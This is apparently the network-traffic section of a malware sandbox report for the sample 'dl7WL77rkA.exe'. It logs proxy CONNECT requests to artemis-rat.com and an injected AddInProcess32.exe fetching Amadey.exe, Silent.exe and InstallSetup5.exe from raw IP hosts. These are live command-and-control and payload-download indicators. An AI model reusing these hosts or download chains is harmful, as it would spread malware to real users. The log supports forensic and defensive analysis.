                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.687254906 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2198192.168.2.553805159.224.45.64418903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516379118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.876199961 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2199192.168.2.555502199.229.254.12941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516482115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2200192.168.2.55545243.255.113.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516483068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092545033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702086926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701951981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2212192.168.2.55548598.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.521671057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2213192.168.2.554470174.77.111.19641453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.522377968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2214192.168.2.555514185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.522913933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2215192.168.2.553891128.199.196.31577153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523257017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2216192.168.2.553934103.28.114.18110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523495913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592628002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.175354004 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2217192.168.2.55551645.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523807049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2218192.168.2.55552058.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.524447918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2219192.168.2.555482103.180.198.13081813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.525549889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.405040026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.750685930 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2220192.168.2.555522212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527339935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2221192.168.2.55552445.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527350903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2222192.168.2.555486103.155.166.14981813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527631998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.022430897 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2223192.168.2.555538121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.528026104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2224192.168.2.554085193.30.13.139993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.528192997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.100380898 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2225192.168.2.55556515.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.082462072 CET79OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.301734924 CET540INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.336432934 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.558962107 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2226192.168.2.55556615.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.090949059 CET79OUTGET /files/Silent.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.323389053 CET540INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2227192.168.2.555564185.172.128.1268044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.099591017 CET82OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407174110 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0
Mar 11, 2024 03:30:57.179621935 CET | 58 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Mar 11, 2024 03:30:57.513179064 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
ETag: "1ca8e4-6135951a2b6e0"
Accept-Ranges: bytes
Content-Length: 1878244
Content-Type: application/x-msdos-program
Mar 11, 2024 03:30:58.007416010 CET | 58 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Mar 11, 2024 03:30:59.465027094 CET | 58 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2228 | 192.168.2.5 | 55567 | 185.172.128.126 | 80 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:54.218384027 CET | 82 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Connection: Keep-Alive
Mar 11, 2024 03:30:54.526312113 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:54 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
ETag: "1ca8e4-6135951a2b6e0"
Accept-Ranges: bytes
Content-Length: 1878244
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Mar 11, 2024 03:30:57.341768026 CET | 58 | OUT | GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Mar 11, 2024 03:30:57.652703047 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
ETag: "1ca8e4-6135951a2b6e0"
Accept-Ranges: bytes
Content-Length: 1878244
Content-Type: application/x-msdos-program
Mar 11, 2024 03:30:58.157933950 CET  58                 OUT        GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126
Mar 11, 2024 03:30:59.090786934 CET  58                 OUT        GET /InstallSetup5.exe HTTP/1.1
Host: 185.172.128.126


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID    Process
2229        192.168.2.5  55577        107.167.110.211  80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:54.750387907 CET  135                OUT        GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Connection: Keep-Alive
Mar 11, 2024 03:30:54.967305899 CET  424                IN         HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:54 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID    Process
2230        192.168.2.5  55578        107.167.110.211  80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:54.751183033 CET  135                OUT        GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Connection: Keep-Alive
Mar 11, 2024 03:30:54.967293978 CET  424                IN         HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:54 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID    Process
2231        192.168.2.5  55595        15.204.49.148   80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:56.831438065 CET  55                 OUT        GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:57.050627947 CET  484                IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
Mar 11, 2024 03:30:57.051220894 CET  55                 OUT        GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:57.272334099 CET  484                IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID    Process
2232        192.168.2.5  55596        15.204.49.148   80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:56.842617035 CET  55                 OUT        GET /files/Silent.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:57.057076931 CET  484                IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID    Process
2233        192.168.2.5  55594        107.167.110.211  80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:56.844363928 CET  111                OUT        GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:30:57.066948891 CET  424                IN         HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID    Process
2234        192.168.2.5  55600        107.167.110.211  80                44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp                            Bytes transferred  Direction  Data
Mar 11, 2024 03:30:56.866734982 CET  111                OUT        GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Mar 11, 2024 03:30:57.084367990 CET  424                IN         HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2235 | 192.168.2.5 | 55611 | 15.204.49.148 | 80 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:58.346642971 CET | 55 | OUT | GET /files/Amadey.exe HTTP/1.1
Host: 15.204.49.148
Mar 11, 2024 03:30:58.538284063 CET | 484 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Mar 2024 02:30:56 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
